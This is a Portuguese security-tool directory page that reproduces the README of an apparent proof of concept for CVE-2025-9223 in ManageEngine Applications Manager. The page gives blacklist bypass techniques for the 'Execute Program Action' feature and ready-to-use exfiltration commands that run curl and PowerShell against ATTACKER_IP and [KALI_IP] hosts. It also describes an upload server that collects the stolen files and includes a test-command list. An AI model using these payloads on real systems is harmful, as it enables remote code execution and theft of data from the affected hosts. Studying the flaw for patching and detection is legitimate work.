Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/networkkiller/cve-2025-9223
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebExfiltração de DadosTestes de PenetraçãoComando e ControleAprendizado e Educação
GitHubnetworkkiller/cve-2025-9223

CVE-2025-9223

Prova de Conceito CVE-2025-9223

Ver Repositório
2há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Applications Manager - Execute Program Action Bypass PoC

Security Research Python 3.x Proof of Concept

📖 Descrição

Este repositório contém uma Prova de Conceito (PoC) que demonstra uma vulnerabilidade de execução de comandos na função "Execute Program Action" do ManageEngine Applications Manager.

🔍 Detalhes da Vulnerabilidade

O Applications Manager utiliza uma lista negra (BlackListCommands) para bloquear comandos perigosos, mas a validação possui falhas críticas:

  • Validação baseada em strings apenas no primeiro token
  • Sem normalização de caminhos ou expansão de variáveis de ambiente
  • Sem proteção contra execução indireta através de scripts

🚨 Métodos de Bypass

MétodoExemplo
Caminho AbsolutoC:\Windows\System32\netstat.exe
Variáveis de Ambiente%SystemRoot%\System32\netstat.exe
Script Wrapperecho netstat > a.bat && a.bat

💥 Impacto

  • ✅ Execução Remota de Código (RCE) autenticada no host do Applications Manager
  • ✅ Execução completa de comandos do sistema evadindo restrições de segurança
  • ✅ Exfiltração de dados usando utilitários do sistema (curl, powershell, certutil)

📤 Exemplo de Payload de Exfiltração

root@kitploit:~
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload

🛠️ Configuração e Uso

Pré-requisitos

  • Python 3.x
  • Acesso de rede à instância do Applications Manager alvo
  • Acesso autenticado com permissões de "Execute Program Action"

Servidor de Upload de Arquivos

O script upload_server.py fornece um servidor HTTP simples para receber arquivos exfiltrados.

Uso Básico

root@kitploit:~
python3 upload_server.py

Opções Avançadas

root@kitploit:~
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads

Parâmetros

  • --host: Endereço de vinculação (padrão: 0.0.0.0)
  • --port: Porta HTTP (padrão: 8000)
  • --dir: Diretório de saída (padrão: diretório atual)

Endpoints da API

MétodoEndpointDescrição
GET/Lista arquivos enviados recentemente
POST/uploadEnvia arquivos (multipart/form-data)
PUT/upload/[filename]Upload direto de arquivos

Características de Segurança

✅ Proteção contra path traversal
✅ Nomes de arquivo únicos com timestamp
✅ Registro de requisições com IP e User-Agent
✅ Validação de tipo de conteúdo

🎯 Comandos de Teste

Crie um arquivo test_commands.txt com exemplos de bypass:

root@kitploit:~
# Bypass con ruta absoluta
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# Bypass con variables de entorno
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# Bypass con script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# Ejemplos de exfiltración de datos
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"

⚠️ Aviso Legal

IMPORTANTE: Esta ferramenta é fornecida apenas para fins educacionais e de testes autorizados.

❌ NÃO usar em sistemas que não possua ou não tenha permissão explícita para testar
❌ NÃO usar para nenhuma atividade ilegal
✅ SIM usar apenas em ambientes controlados para pesquisa de segurança
✅ SIM obter autorização adequada antes de realizar testes

O autor não é responsável por qualquer uso indevido desta ferramenta. Os usuários assumem toda a responsabilidade e risco.

📄 Licença

Este projeto é apenas para fins de pesquisa e educacionais. Todos os direitos reservados.

👨‍💻 Autor

Johan Aybar - Para fins educacionais


⚠️ LEMBRETE: Este PoC deve ser usado apenas em ambientes de teste autorizados. O uso não autorizado pode ser ilegal e é estritamente proibido.

Baixar ferramenta